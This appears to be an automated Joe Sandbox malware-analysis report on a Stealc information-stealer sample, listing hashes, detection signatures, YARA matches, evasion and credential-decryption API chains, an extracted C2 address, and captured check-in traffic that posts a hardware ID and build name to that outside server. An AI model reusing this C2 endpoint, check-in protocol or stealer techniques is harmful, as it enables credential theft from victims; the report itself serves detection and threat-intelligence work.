Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Overview

General Information

Sample name:100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
Analysis ID:1528595
MD5:e35c6ad41081ddcda2ba9c65b5b1a6f8
SHA1:e675ad90c164244bac1c3a5cbacc932e9e0b3a8d
SHA256:100f1c346cbcff15f4d9d75c791000625850e1c82b44ce9427ccf441f5c3cb79
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe (PID: 5500 cmdline: "C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe" MD5: E35C6AD41081DDCDA2BA9C65B5B1A6F8)
    • WerFault.exe (PID: 1776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1308 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x226c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T03:52:04.363921+020020442431Malware Command and Control Activity Detected192.168.2.54970462.204.41.15080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeAvira: detected
                    Source: 00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}
                    Source: http://62.204.41.150Virustotal: Detection: 9%Perma Link
                    Source: http://62.204.41.150/Virustotal: Detection: 9%Perma Link
                    Source: http://62.204.41.150/edd20096ecef326d.phpVirustotal: Detection: 12%Perma Link
                    Source: http://62.204.41.150/owsVirustotal: Detection: 6%Perma Link
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeReversingLabs: Detection: 28%
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeVirustotal: Detection: 37%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022ACA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_022ACA87
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022A74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_022A74A7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022A9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_022A9D27
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_022B9107
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022A9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_022A9DC7

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeUnpacked PE file: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022AE697
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022B3B17
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022B4B77
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022AEF87
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022B47D7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022AE077
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022ADCE7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AF8F1 FindFirstFileA,0_2_022AF8F1
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022AC0D7
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022A1937
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022B4107
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022AF917

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80
                    Source: Malware configuration extractorURLs: http://62.204.41.150/edd20096ecef326d.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 62.204.41.150Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 41 30 32 44 45 30 34 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="hwid"4BBA02DE0439786254513------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="build"default6_cap------GCGHCBKFCFBFHIDHDBFC--
                    Source: Joe Sandbox ViewIP Address: 62.204.41.150 62.204.41.150
                    Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,HeapCreate,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 62.204.41.150Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 41 30 32 44 45 30 34 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="hwid"4BBA02DE0439786254513------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="build"default6_cap------GCGHCBKFCFBFHIDHDBFC--
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204081074.000000000073E000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/0
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php)
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php?
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpL
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpl
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpo
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/ows
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1308
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\5YWSW8ED.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5500
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d0253710-21c3-4f21-aed6-9a7924c91d3aJump to behavior
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeReversingLabs: Detection: 28%
                    Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeVirustotal: Detection: 37%
                    Source: unknownProcess created: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe "C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe"
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1308
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeSection loaded: kernel.appcore.dllJump to behavior
